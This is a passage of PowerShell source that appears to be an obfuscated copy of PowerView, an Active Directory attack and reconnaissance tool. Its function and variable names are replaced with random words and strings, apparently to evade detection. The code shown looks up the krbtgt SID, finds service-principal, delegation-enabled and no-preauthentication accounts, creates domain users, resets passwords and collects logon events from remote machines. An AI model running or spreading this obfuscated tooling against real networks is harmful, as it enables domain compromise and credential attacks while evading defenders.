$FtZybEmZ99 = (horseshoed -mxWgOMSt99 "krbtgt" -ADDDGomQ99 $mhDlMuXg99.RootDomain.Name -KWcDeQDF99 $KWcDeQDF99).objectsid | |
} | |
else { | |
$FtZybEmZ99 = (horseshoed -mxWgOMSt99 "krbtgt" -ADDDGomQ99 $mhDlMuXg99.RootDomain.Name).objectsid | |
} | |
$Parts = $FtZybEmZ99 -Split '-' | |
$FtZybEmZ99 = $Parts[0..$($Parts.length-2)] -join '-' | |
$mhDlMuXg99 | Add-Member NoteProperty 'RootDomainSid' $FtZybEmZ99 | |
$mhDlMuXg99 | |
} | |
} | |
} | |
function iniquitous { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('System.DirectoryServices.ActiveDirectory.Domain')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True)] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$hntgZzeP99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
PROCESS { | |
$LYGCPrDZ99 = @{} | |
if ($PSBoundParameters['Forest']) { $LYGCPrDZ99['Forest'] = $hntgZzeP99 } | |
if ($PSBoundParameters['Credential']) { $LYGCPrDZ99['Credential'] = $KWcDeQDF99 } | |
$mhDlMuXg99 = truthers @Arguments | |
if ($mhDlMuXg99) { | |
$mhDlMuXg99.Domains | |
} | |
} | |
} | |
function Po { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('System.DirectoryServices.ActiveDirectory.GlobalCatalog')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True)] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$hntgZzeP99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
PROCESS { | |
$LYGCPrDZ99 = @{} | |
if ($PSBoundParameters['Forest']) { $LYGCPrDZ99['Forest'] = $hntgZzeP99 } | |
if ($PSBoundParameters['Credential']) { $LYGCPrDZ99['Credential'] = $KWcDeQDF99 } | |
$mhDlMuXg99 = truthers @Arguments | |
if ($mhDlMuXg99) { | |
$mhDlMuXg99.FindAllGlobalCatalogs() | |
} | |
} | |
} | |
function dumfounding { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType([System.DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass])] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True)] | |
[Alias('Class')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$XQjWSuAj99, | |
[Alias('Name')] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$hntgZzeP99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
PROCESS { | |
$LYGCPrDZ99 = @{} | |
if ($PSBoundParameters['Forest']) { $LYGCPrDZ99['Forest'] = $hntgZzeP99 } | |
if ($PSBoundParameters['Credential']) { $LYGCPrDZ99['Credential'] = $KWcDeQDF99 } | |
$mhDlMuXg99 = truthers @Arguments | |
if ($mhDlMuXg99) { | |
if ($PSBoundParameters['ClassName']) { | |
ForEach ($vIUGPRBY99 in $XQjWSuAj99) { | |
$mhDlMuXg99.Schema.FindClass($vIUGPRBY99) | |
} | |
} | |
else { | |
$mhDlMuXg99.Schema.FindAllClasses() | |
} | |
} | |
} | |
} | |
function supporter { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.PropertyOutlier')] | |
[CmdletBinding(DefaultParameterSetName = 'ClassName')] | |
Param( | |
[Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ClassName')] | |
[Alias('Class')] | |
[ValidateSet('User', 'Group', 'Computer')] | |
[String] | |
$XQjWSuAj99, | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$sfAzwkXr99, | |
[Parameter(ValueFromPipeline = $True, Mandatory = $True, ParameterSetName = 'ReferenceObject')] | |
[PSCustomObject] | |
$BRkoFlWZ99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$fyLtAHeQ99 = @('admincount','accountexpires','badpasswordtime','badpwdcount','cn','codepage','countrycode','description', 'displayname','distinguishedname','dscorepropagationdata','givenname','instancetype','iscriticalsystemobject','lastlogoff','lastlogon','lastlogontimestamp','lockouttime','logoncount','memberof','msds-supportedencryptiontypes','name','objectcategory','objectclass','objectguid','objectsid','primarygroupid','pwdlastset','samaccountname','samaccounttype','sn','useraccountcontrol','userprincipalname','usnchanged','usncreated','whenchanged','whencreated') | |
$CEBKEWMx99 = @('admincount','cn','description','distinguishedname','dscorepropagationdata','grouptype','instancetype','iscriticalsystemobject','member','memberof','name','objectcategory','objectclass','objectguid','objectsid','samaccountname','samaccounttype','systemflags','usnchanged','usncreated','whenchanged','whencreated') | |
$OTGjhIdb99 = @('accountexpires','badpasswordtime','badpwdcount','cn','codepage','countrycode','distinguishedname','dnshostname','dscorepropagationdata','instancetype','iscriticalsystemobject','lastlogoff','lastlogon','lastlogontimestamp','localpolicyflags','logoncount','msds-supportedencryptiontypes','name','objectcategory','objectclass','objectguid','objectsid','operatingsystem','operatingsystemservicepack','operatingsystemversion','primarygroupid','pwdlastset','samaccountname','samaccounttype','serviceprincipalname','useraccountcontrol','usnchanged','usncreated','whenchanged','whencreated') | |
$ufgcNRNN99 = @{} | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['LDAPFilter']) { $ufgcNRNN99['LDAPFilter'] = $hzaXgjDv99 } | |
if ($PSBoundParameters['SearchBase']) { $ufgcNRNN99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $ufgcNRNN99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $ufgcNRNN99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
if ($PSBoundParameters['Domain']) { | |
if ($PSBoundParameters['Credential']) { | |
$oheZebYI99 = aforethought -ADDDGomQ99 $ADDDGomQ99 | Select-Object -ExpandProperty Forest | Select-Object -ExpandProperty Name | |
} | |
else { | |
$oheZebYI99 = aforethought -ADDDGomQ99 $ADDDGomQ99 -KWcDeQDF99 $KWcDeQDF99 | Select-Object -ExpandProperty Forest | Select-Object -ExpandProperty Name | |
} | |
Write-Verbose "[supporter] Enumerated forest '$oheZebYI99' for target domain '$ADDDGomQ99'" | |
} | |
$bfAzgfVH99 = @{} | |
if ($PSBoundParameters['Credential']) { $bfAzgfVH99['Credential'] = $KWcDeQDF99 } | |
if ($oheZebYI99) { | |
$bfAzgfVH99['Forest'] = $oheZebYI99 | |
} | |
} | |
PROCESS { | |
if ($PSBoundParameters['ReferencePropertySet']) { | |
Write-Verbose "[supporter] Using specified -sfAzwkXr99" | |
$GIJUbmdx99 = $sfAzwkXr99 | |
} | |
elseif ($PSBoundParameters['ReferenceObject']) { | |
Write-Verbose "[supporter] Extracting property names from -BRkoFlWZ99 to use as the reference property set" | |
$GIJUbmdx99 = Get-Member -MdtHuWsJ99 $BRkoFlWZ99 -MemberType NoteProperty | Select-Object -Expand Name | |
$gHIoWswX99 = $BRkoFlWZ99.objectclass | Select-Object -Last 1 | |
Write-Verbose "[supporter] Calculated ReferenceObjectClass : $gHIoWswX99" | |
} | |
else { | |
Write-Verbose "[supporter] Using the default reference property set for the object class '$XQjWSuAj99'" | |
} | |
if (($XQjWSuAj99 -eq 'User') -or ($gHIoWswX99 -eq 'User')) { | |
$YAGquPZM99 = horseshoed @SearcherArguments | |
if (-not $GIJUbmdx99) { | |
$GIJUbmdx99 = $fyLtAHeQ99 | |
} | |
} | |
elseif (($XQjWSuAj99 -eq 'Group') -or ($gHIoWswX99 -eq 'Group')) { | |
$YAGquPZM99 = lariat @SearcherArguments | |
if (-not $GIJUbmdx99) { | |
$GIJUbmdx99 = $CEBKEWMx99 | |
} | |
} | |
elseif (($XQjWSuAj99 -eq 'Computer') -or ($gHIoWswX99 -eq 'Computer')) { | |
$YAGquPZM99 = deputes @SearcherArguments | |
if (-not $GIJUbmdx99) { | |
$GIJUbmdx99 = $OTGjhIdb99 | |
} | |
} | |
else { | |
throw "[supporter] Invalid class: $XQjWSuAj99" | |
} | |
ForEach ($Object in $YAGquPZM99) { | |
$RJkaQpaQ99 = Get-Member -MdtHuWsJ99 $Object -MemberType NoteProperty | Select-Object -Expand Name | |
ForEach($zXVYLSCr99 in $RJkaQpaQ99) { | |
if ($GIJUbmdx99 -NotContains $zXVYLSCr99) { | |
$Out = New-Object PSObject | |
$Out | Add-Member Noteproperty 'SamAccountName' $Object.SamAccountName | |
$Out | Add-Member Noteproperty 'Property' $zXVYLSCr99 | |
$Out | Add-Member Noteproperty 'Value' $Object.$zXVYLSCr99 | |
$Out.PSObject.TypeNames.Insert(0, 'PowerView.PropertyOutlier') | |
$Out | |
} | |
} | |
} | |
} | |
} | |
function horseshoed { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.User')] | |
[OutputType('PowerView.User.Raw')] | |
[CmdletBinding(DefaultParameterSetName = 'AllowDelegation')] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] | |
[String[]] | |
$mxWgOMSt99, | |
[Switch] | |
$SPN, | |
[Switch] | |
$IhhlpNvL99, | |
[Parameter(ParameterSetName = 'AllowDelegation')] | |
[Switch] | |
$jrhTpDCx99, | |
[Parameter(ParameterSetName = 'DisallowDelegation')] | |
[Switch] | |
$cucCMuLL99, | |
[Switch] | |
$YhhNbDPz99, | |
[Alias('KerberosPreauthNotRequired', 'NoPreauth')] | |
[Switch] | |
$OzqBlPkH99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$nmZxBYze99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] | |
[String] | |
$FaXdBAYg99, | |
[Switch] | |
$DPTKXMKA99, | |
[Alias('ReturnOne')] | |
[Switch] | |
$YIVtKGKK99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[Switch] | |
$Raw | |
) | |
DynamicParam { | |
$BFveINmL99 = [Enum]::GetNames($OamCSbsR99) | |
$BFveINmL99 = $BFveINmL99 | ForEach-Object {$_; "NOT_$_"} | |
imperturbability -Name UACFilter -sADNIewc99 $BFveINmL99 -Type ([array]) | |
} | |
BEGIN { | |
$ufgcNRNN99 = @{} | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Properties']) { $ufgcNRNN99['Properties'] = $nmZxBYze99 } | |
if ($PSBoundParameters['SearchBase']) { $ufgcNRNN99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $ufgcNRNN99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['SecurityMasks']) { $ufgcNRNN99['SecurityMasks'] = $FaXdBAYg99 } | |
if ($PSBoundParameters['Tombstone']) { $ufgcNRNN99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
$xEfuvBxo99 = Richelieu @SearcherArguments | |
} | |
PROCESS { | |
if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) { | |
imperturbability -aRhKtQBk99 -kHkbQGKb99 $PSBoundParameters | |
} | |
if ($xEfuvBxo99) { | |
$btfCLlYC99 = '' | |
$IUDzHsEr99 = '' | |
$mxWgOMSt99 | Where-Object {$_} | ForEach-Object { | |
$KzBFOtcK99 = $_.Replace('(', '\28').Replace(')', '\29') | |
if ($KzBFOtcK99 -match '^S-1-') { | |
$btfCLlYC99 += "(objectsid=$KzBFOtcK99)" | |
} | |
elseif ($KzBFOtcK99 -match '^CN=') { | |
$btfCLlYC99 += "(distinguishedname=$KzBFOtcK99)" | |
if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { | |
$wXLTskQJ99 = $KzBFOtcK99.SubString($KzBFOtcK99.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' | |
Write-Verbose "[horseshoed] Extracted domain '$wXLTskQJ99' from '$KzBFOtcK99'" | |
$ufgcNRNN99['Domain'] = $wXLTskQJ99 | |
$xEfuvBxo99 = Richelieu @SearcherArguments | |
if (-not $xEfuvBxo99) { | |
Write-Warning "[horseshoed] Unable to retrieve domain searcher for '$wXLTskQJ99'" | |
} | |
} | |
} | |
elseif ($KzBFOtcK99 -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { | |
$jjIYltxr99 = (([Guid]$KzBFOtcK99).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' | |
$btfCLlYC99 += "(objectguid=$jjIYltxr99)" | |
} | |
elseif ($KzBFOtcK99.Contains('\')) { | |
$iDLAGYJo99 = $KzBFOtcK99.Replace('\28', '(').Replace('\29', ')') | plagiarist -sVUXjDxI99 Canonical | |
if ($iDLAGYJo99) { | |
$VeuSFWRJ99 = $iDLAGYJo99.SubString(0, $iDLAGYJo99.IndexOf('/')) | |
$bnjyYveg99 = $KzBFOtcK99.Split('\')[1] | |
$btfCLlYC99 += "(samAccountName=$bnjyYveg99)" | |
$ufgcNRNN99['Domain'] = $VeuSFWRJ99 | |
Write-Verbose "[horseshoed] Extracted domain '$VeuSFWRJ99' from '$KzBFOtcK99'" | |
$xEfuvBxo99 = Richelieu @SearcherArguments | |
} | |
} | |
else { | |
$btfCLlYC99 += "(samAccountName=$KzBFOtcK99)" | |
} | |
} | |
if ($btfCLlYC99 -and ($btfCLlYC99.Trim() -ne '') ) { | |
$IUDzHsEr99 += "(|$btfCLlYC99)" | |
} | |
if ($PSBoundParameters['SPN']) { | |
Write-Verbose '[horseshoed] Searching for non-null service principal names' | |
$IUDzHsEr99 += '(servicePrincipalName=*)' | |
} | |
if ($PSBoundParameters['AllowDelegation']) { | |
Write-Verbose '[horseshoed] Searching for users who can be delegated' | |
$IUDzHsEr99 += '(!(userAccountControl:1.2.840.113556.1.4.803:=1048574))' | |
} | |
if ($PSBoundParameters['DisallowDelegation']) { | |
Write-Verbose '[horseshoed] Searching for users who are sensitive and not trusted for delegation' | |
$IUDzHsEr99 += '(userAccountControl:1.2.840.113556.1.4.803:=1048574)' | |
} | |
if ($PSBoundParameters['AdminCount']) { | |
Write-Verbose '[horseshoed] Searching for adminCount=1' | |
$IUDzHsEr99 += '(admincount=1)' | |
} | |
if ($PSBoundParameters['TrustedToAuth']) { | |
Write-Verbose '[horseshoed] Searching for users that are trusted to authenticate for other principals' | |
$IUDzHsEr99 += '(msds-allowedtodelegateto=*)' | |
} | |
if ($PSBoundParameters['PreauthNotRequired']) { | |
Write-Verbose '[horseshoed] Searching for user accounts that do not require kerberos preauthenticate' | |
$IUDzHsEr99 += '(userAccountControl:1.2.840.113556.1.4.803:=4194304)' | |
} | |
if ($PSBoundParameters['LDAPFilter']) { | |
Write-Verbose "[horseshoed] Using additional LDAP filter: $hzaXgjDv99" | |
$IUDzHsEr99 += "$hzaXgjDv99" | |
} | |
$gxZgUNPx99 | Where-Object {$_} | ForEach-Object { | |
if ($_ -match 'NOT_.*') { | |
$esPyPtCz99 = $_.Substring(4) | |
$nszuvJHF99 = [Int]($OamCSbsR99::$esPyPtCz99) | |
$IUDzHsEr99 += "(!(userAccountControl:1.2.840.113556.1.4.803:=$nszuvJHF99))" | |
} | |
else { | |
$nszuvJHF99 = [Int]($OamCSbsR99::$_) | |
$IUDzHsEr99 += "(userAccountControl:1.2.840.113556.1.4.803:=$nszuvJHF99)" | |
} | |
} | |
$xEfuvBxo99.filter = "(&(samAccountType=805306368)$IUDzHsEr99)" | |
Write-Verbose "[horseshoed] filter string: $($xEfuvBxo99.filter)" | |
if ($PSBoundParameters['FindOne']) { $hCEVDJUr99 = $xEfuvBxo99.FindOne() } | |
else { $hCEVDJUr99 = $xEfuvBxo99.FindAll() } | |
$hCEVDJUr99 | Where-Object {$_} | ForEach-Object { | |
if ($PSBoundParameters['Raw']) { | |
$User = $_ | |
$User.PSObject.TypeNames.Insert(0, 'PowerView.User.Raw') | |
} | |
else { | |
$User = epicure -nmZxBYze99 $_.Properties | |
$User.PSObject.TypeNames.Insert(0, 'PowerView.User') | |
} | |
$User | |
} | |
if ($hCEVDJUr99) { | |
try { $hCEVDJUr99.dispose() } | |
catch { | |
Write-Verbose "[horseshoed] Error disposing of the Results object: $_" | |
} | |
} | |
$xEfuvBxo99.dispose() | |
} | |
} | |
} | |
function splashed { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('DirectoryServices.AccountManagement.UserPrincipal')] | |
Param( | |
[Parameter(Mandatory = $True)] | |
[ValidateLength(0, 256)] | |
[String] | |
$XXulWBmN99, | |
[Parameter(Mandatory = $True)] | |
[ValidateNotNullOrEmpty()] | |
[Alias('Password')] | |
[Security.SecureString] | |
$DQqagUux99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$Name, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$YdYIUvri99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$TyFsoKwr99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
$QRmioDKX99 = @{ | |
'Identity' = $XXulWBmN99 | |
} | |
if ($PSBoundParameters['Domain']) { $QRmioDKX99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Credential']) { $QRmioDKX99['Credential'] = $KWcDeQDF99 } | |
$hrtTwEFj99 = dejection @ContextArguments | |
if ($hrtTwEFj99) { | |
$User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($hrtTwEFj99.Context) | |
$User.SamAccountName = $hrtTwEFj99.Identity | |
$TCaAjgjf99 = New-Object System.Management.Automation.PSCredential('a', $DQqagUux99) | |
$User.SetPassword($TCaAjgjf99.GetNetworkCredential().Password) | |
$User.Enabled = $True | |
$User.PasswordNotRequired = $False | |
if ($PSBoundParameters['Name']) { | |
$User.Name = $Name | |
} | |
else { | |
$User.Name = $hrtTwEFj99.Identity | |
} | |
if ($PSBoundParameters['DisplayName']) { | |
$User.DisplayName = $YdYIUvri99 | |
} | |
else { | |
$User.DisplayName = $hrtTwEFj99.Identity | |
} | |
if ($PSBoundParameters['Description']) { | |
$User.Description = $TyFsoKwr99 | |
} | |
Write-Verbose "[splashed] Attempting to create user '$XXulWBmN99'" | |
try { | |
$Null = $User.Save() | |
Write-Verbose "[splashed] User '$XXulWBmN99' successfully created" | |
$User | |
} | |
catch { | |
Write-Warning "[splashed] Error creating user '$XXulWBmN99' : $_" | |
} | |
} | |
} | |
function graphing { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('DirectoryServices.AccountManagement.UserPrincipal')] | |
Param( | |
[Parameter(Position = 0, Mandatory = $True)] | |
[Alias('UserName', 'UserIdentity', 'User')] | |
[String] | |
$mxWgOMSt99, | |
[Parameter(Mandatory = $True)] | |
[ValidateNotNullOrEmpty()] | |
[Alias('Password')] | |
[Security.SecureString] | |
$DQqagUux99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
$QRmioDKX99 = @{ 'Identity' = $mxWgOMSt99 } | |
if ($PSBoundParameters['Domain']) { $QRmioDKX99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Credential']) { $QRmioDKX99['Credential'] = $KWcDeQDF99 } | |
$hrtTwEFj99 = dejection @ContextArguments | |
if ($hrtTwEFj99) { | |
$User = [System.DirectoryServices.AccountManagement.UserPrincipal]::FindByIdentity($hrtTwEFj99.Context, $mxWgOMSt99) | |
if ($User) { | |
Write-Verbose "[graphing] Attempting to set the password for user '$mxWgOMSt99'" | |
try { | |
$TCaAjgjf99 = New-Object System.Management.Automation.PSCredential('a', $DQqagUux99) | |
$User.SetPassword($TCaAjgjf99.GetNetworkCredential().Password) | |
$Null = $User.Save() | |
Write-Verbose "[graphing] Password for user '$mxWgOMSt99' successfully reset" | |
} | |
catch { | |
Write-Warning "[graphing] Error setting password for user '$mxWgOMSt99' : $_" | |
} | |
} | |
else { | |
Write-Warning "[graphing] Unable to find user '$mxWgOMSt99'" | |
} | |
} | |
} | |
function lunges { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.LogonEvent')] | |
[OutputType('PowerView.ExplicitCredentialLogonEvent')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('dnshostname', 'HostName', 'name')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$MqGzGCsi99 = $Env:COMPUTERNAME, | |
[ValidateNotNullOrEmpty()] | |
[DateTime] | |
$NWuQTklg99 = [DateTime]::Now.AddDays(-1), | |
[ValidateNotNullOrEmpty()] | |
[DateTime] | |
$EFIZkPxX99 = [DateTime]::Now, | |
[ValidateRange(1, 1000000)] | |
[Int] | |
$Tswoyjjp99 = 5000, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$owtcNqmZ99 = @" | |
<QueryList> | |
<Query Id="0" Path="Security"> | |
<!-- Logon events --> | |
<Select Path="Security"> | |
*[ | |
System[ | |
Provider[ | |
@Name='Microsoft-Windows-Security-Auditing' | |
] | |
and (Level=4 or Level=0) and (EventID=4624) | |
and TimeCreated[ | |
@SystemTime>='$($NWuQTklg99.ToUniversalTime().ToString('s'))' and @SystemTime<='$($EFIZkPxX99.ToUniversalTime().ToString('s'))' | |
] | |
] | |
] | |
and | |
*[EventData[Data[@Name='TargetUserName'] != 'ANONYMOUS LOGON']] | |
</Select> | |
<!-- Logon with explicit credential events --> | |
<Select Path="Security"> | |
*[ | |
System[ | |
Provider[ | |
@Name='Microsoft-Windows-Security-Auditing' | |
] | |
and (Level=4 or Level=0) and (EventID=4648) | |
and TimeCreated[ | |
@SystemTime>='$($NWuQTklg99.ToUniversalTime().ToString('s'))' and @SystemTime<='$($EFIZkPxX99.ToUniversalTime().ToString('s'))' | |
] | |
] | |
] | |
</Select> | |
<Suppress Path="Security"> | |
*[ | |
System[ | |
Provider[ | |
@Name='Microsoft-Windows-Security-Auditing' | |
] | |
and | |
(Level=4 or Level=0) and (EventID=4624 or EventID=4625 or EventID=4634) | |
] | |
] | |
and | |
*[ | |
EventData[ | |
( | |
(Data[@Name='LogonType']='5' or Data[@Name='LogonType']='0') | |
or | |
Data[@Name='TargetUserName']='ANONYMOUS LOGON' | |
or | |
Data[@Name='TargetUserSID']='S-1-5-18' | |
) | |
] | |
] | |
</Suppress> | |
</Query> | |
</QueryList> | |
"@ | |
$AYKlKwUI99 = @{ | |
'FilterXPath' = $owtcNqmZ99 | |
'LogName' = 'Security' | |
'MaxEvents' = $Tswoyjjp99 | |
} | |
if ($PSBoundParameters['Credential']) { $AYKlKwUI99['Credential'] = $KWcDeQDF99 } | |
} | |
PROCESS { | |
ForEach ($GrySniik99 in $MqGzGCsi99) { | |
$AYKlKwUI99['ComputerName'] = $GrySniik99 | |
Get-WinEvent @EventArguments| ForEach-Object { | |
$Event = $_ | |
$nmZxBYze99 = $Event.Properties | |
Switch ($Event.Id) { | |
4624 { | |
if(-not $nmZxBYze99[5].Value.EndsWith('$')) { | |
$ySjxeOag99 = New-Object PSObject -Property @{ | |
ComputerName = $GrySniik99 | |
TimeCreated = $Event.TimeCreated | |
EventId = $Event.Id | |
SubjectUserSid = $nmZxBYze99[0].Value.ToString() | |
SubjectUserName = $nmZxBYze99[1].Value | |
SubjectDomainName = $nmZxBYze99[2].Value | |
SubjectLogonId = $nmZxBYze99[3].Value | |
TargetUserSid = $nmZxBYze99[4].Value.ToString() | |
TargetUserName = $nmZxBYze99[5].Value | |
TargetDomainName = $nmZxBYze99[6].Value | |
TargetLogonId = $nmZxBYze99[7].Value | |
LogonType = $nmZxBYze99[8].Value | |
LogonProcessName = $nmZxBYze99[9].Value | |
AuthenticationPackageName = $nmZxBYze99[10].Value | |
WorkstationName = $nmZxBYze99[11].Value | |
LogonGuid = $nmZxBYze99[12].Value | |
TransmittedServices = $nmZxBYze99[13].Value | |
LmPackageName = $nmZxBYze99[14].Value | |
KeyLength = $nmZxBYze99[15].Value | |
ProcessId = $nmZxBYze99[16].Value | |
ProcessName = $nmZxBYze99[17].Value | |
IpAddress = $nmZxBYze99[18].Value | |
IpPort = $nmZxBYze99[19].Value | |
ImpersonationLevel = $nmZxBYze99[20].Value | |
RestrictedAdminMode = $nmZxBYze99[21].Value | |
TargetOutboundUserName = $nmZxBYze99[22].Value | |
TargetOutboundDomainName = $nmZxBYze99[23].Value | |
VirtualAccount = $nmZxBYze99[24].Value | |
TargetLinkedLogonId = $nmZxBYze99[25].Value | |
ElevatedToken = $nmZxBYze99[26].Value | |
} | |
$ySjxeOag99.PSObject.TypeNames.Insert(0, 'PowerView.LogonEvent') | |
$ySjxeOag99 | |
} | |
} | |
4648 { | |
if((-not $nmZxBYze99[5].Value.EndsWith('$')) -and ($nmZxBYze99[11].Value -match 'taskhost\.exe')) { | |
$ySjxeOag99 = New-Object PSObject -Property @{ | |
ComputerName = $GrySniik99 | |
TimeCreated = $Event.TimeCreated | |
EventId = $Event.Id | |
SubjectUserSid = $nmZxBYze99[0].Value.ToString() | |
SubjectUserName = $nmZxBYze99[1].Value | |
SubjectDomainName = $nmZxBYze99[2].Value | |
SubjectLogonId = $nmZxBYze99[3].Value | |
LogonGuid = $nmZxBYze99[4].Value.ToString() | |
TargetUserName = $nmZxBYze99[5].Value | |
TargetDomainName = $nmZxBYze99[6].Value | |
TargetLogonGuid = $nmZxBYze99[7].Value | |
TargetServerName = $nmZxBYze99[8].Value | |
TargetInfo = $nmZxBYze99[9].Value | |
ProcessId = $nmZxBYze99[10].Value | |
ProcessName = $nmZxBYze99[11].Value | |
IpAddress = $nmZxBYze99[12].Value | |
IpPort = $nmZxBYze99[13].Value | |
} | |
$ySjxeOag99.PSObject.TypeNames.Insert(0, 'PowerView.ExplicitCredentialLogonEvent') | |
